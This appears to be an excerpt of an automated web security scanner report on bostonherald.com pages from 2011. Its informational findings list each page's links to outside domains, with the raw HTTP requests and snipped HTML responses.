...[SNIP]...
<!--//include: NDN Video Tease //-->
<iframe style="position:relative; margin-bottom: 16px;" src="http://widget.newsinc.com/toppicks_bostonherald_ent.html" frameborder="0" scrolling="no" width="300" height="225"></iframe>
...[SNIP]...
<a href="/entertainment/lifestyle/view.bg?articleid=1312514"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/c1e423_ltpSteam012811.jpg"></a>
...[SNIP]...
<div style="font-size: 10px; color: #999; margin-top: 6px;">
           Powered by <a href="http://www.local.com" style="text-decoration: none;">Local.com</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

7.7. http://www.bostonherald.com/entertainment/movies/reviews/view.bg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/movies/reviews/view.bg

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /entertainment/movies/reviews/view.bg?articleid=1312518&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:07:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 45676

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<meta name="PUBDATE" content="Friday, January 28, 2011" />

   <link rel="alternate" title="Movie Reviews - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/entertainment/movies/reviews/" type="application/rss+xml">

   <script type="text/javascript" language="JavaScript">
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fentertainment%2Fmovies%2Freviews%2Fview%2F20110128killermoves_statham_fine-tunes_mechanic_mayhem%2Fsrvc%3Dhome%26position%3Dalso&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<div id="bylineArea">
                                        <img class="bylineImage" src="http://cache.heraldinteractive.com/images/siteImages/reporters/james_verniere.gif?1=1" alt="James Verniere" />
                                       <span class="bold">
...[SNIP]...
<a href="/entertainment/movies/reviews/view.bg?articleid=1312518&amp;format=email"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif"
       alt="Email" />
E-mail</a>
...[SNIP]...
<a href="/entertainment/movies/reviews/view.bg?articleid=1312518&amp;format=text"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif"
       alt="Printable" />
Print</a>
...[SNIP]...
<a href="/entertainment/movies/reviews/view.bg?articleid=1312518&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
       alt="Comments" />
(2) Comments</a>
...[SNIP]...
<a href="#" onclick="textsize('up');return false" title="Increase font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif" alt="Larger" /></a><a href="#" onclick="textsize('down');return false" title="Decrease font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif" alt="Smaller" /></a>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Jason Statham fine-tunes &lsquo;Mechanic&rsquo; mayhem');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<a href="/entertainment/movies/reviews/view.bg?articleid=1312518&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />
(2) Comments&nbsp;&nbsp;|&nbsp;&nbsp;Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif">&nbsp;<b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/8345b6_Statham_01282011.jpg" alt="AUTO PILOT: Jason Statham kicks more..." /></div>
...[SNIP]...
<div id="embedDiv">
<iframe src='http://widgets.mobilelocalnews.com?uid=42b39fdb198522d2bfc6b1f64cd98365' frameborder='0' height='325' width='305' scrolling='no'></iframe>
...[SNIP]...
<a href="/entertainment/movies/general/view/20110125action_star_statham_gets_his_fix_in_mechanic_remake/"><img src="http://multimedia.heraldinteractive.com/images/20110125/stp/147abf_stath_01252011.jpg" alt="Action star Jason Statham gets his fix in &lsquo;Mechanic&rsquo; remake" /></a>
...[SNIP]...
<!--//include: NDN Video Tease //-->
<iframe style="position:relative; margin-bottom: 16px;" src="http://widget.newsinc.com/toppicks_bostonherald_ent.html" frameborder="0" scrolling="no" width="300" height="225"></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

7.8. http://www.bostonherald.com/galleries/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /galleries/index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /galleries/index.php?gallery_id=10 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:14:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 21464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Boston Herald Sports Cov
...[SNIP]...
<meta name="SUBSECTION" content="Multimedia Center" />
<link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/universal.css" media="all" />
<link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/version5.0/sections_beta.css" media="all" />
<link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/version5.0/multimedia_beta.css?nocache=1234" media="all" />


<style type="text/css">
...[SNIP]...
<a id="galleryHeaderLink" href="#"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<a href="?gallery_id=10&p=0" ><img class="galleryThumb galleryThumbSelected" src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01282011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=1" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01272011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=2" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01262011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=3" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01252011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=4" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01242011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=5" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01232011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=6" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01202011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=7" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01212011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=8" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01192011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=9" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/bh_Jan182011_A064.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=10" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01172011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=11" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports20110116.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=12" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports01152011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=13" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/bh_Jan142011_A076.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=14" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01132011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=15" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01122011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=16" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01112011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=17" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01102011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=18" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01092011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=19" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports01082010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=20" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01072011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=21" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01062011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=22" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01052011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=23" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01042011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=24" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_02032011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=25" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01022011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=26" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01012011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=27" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12312010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=28" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12302010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=29" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12292010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=30" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12282010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=31" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12272010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=32" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12262010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=33" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12252010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=34" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12242010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=35" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12232010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=36" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12222010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=37" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12212010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=38" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports12202010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=39" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12192010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=40" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports20101218.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=41" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12172010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=42" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12162010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=43" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12152010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=44" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/bh_Dec142010_A060.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=45" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/swports12132010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=46" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports12092010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=47" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12122010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=48" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12112010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=49" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12102010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=50" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12082010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=51" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/bh_Dec072010_A068.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=52" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12062010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=53" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12052010.jpg" alt="Photo" /></a>
...[SNIP]...
<div id="galleryLeftPhotoLeft">
<img id="galleryImage" style="border:solid 1px #000" src="http://multimedia.heraldinteractive.com/images/galleries/Sports_01282011.jpg">

<br />
...[SNIP]...

7.9. http://www.bostonherald.com/homepage.bg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /homepage.bg

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /homepage.bg?showResults=1#results HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:13:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 156016

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- // 728_SWAP_TEMPLATE // -
...[SNIP]...
<!--// end INTERSTITIAL //-->
<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js?nocache=123" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

   <link rel="alternate" title="Home - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/" type="application/rss+xml" />
<script type="text/javascript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2F%3FshowResults%3D1&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" width="242" height="90"></a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/rssBlue.gif" alt="Boston Herald RSS" /></a>
...[SNIP]...
<div id="headerAd">
<IFRAME WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_top ID=i_top FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome"></IFRAME>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
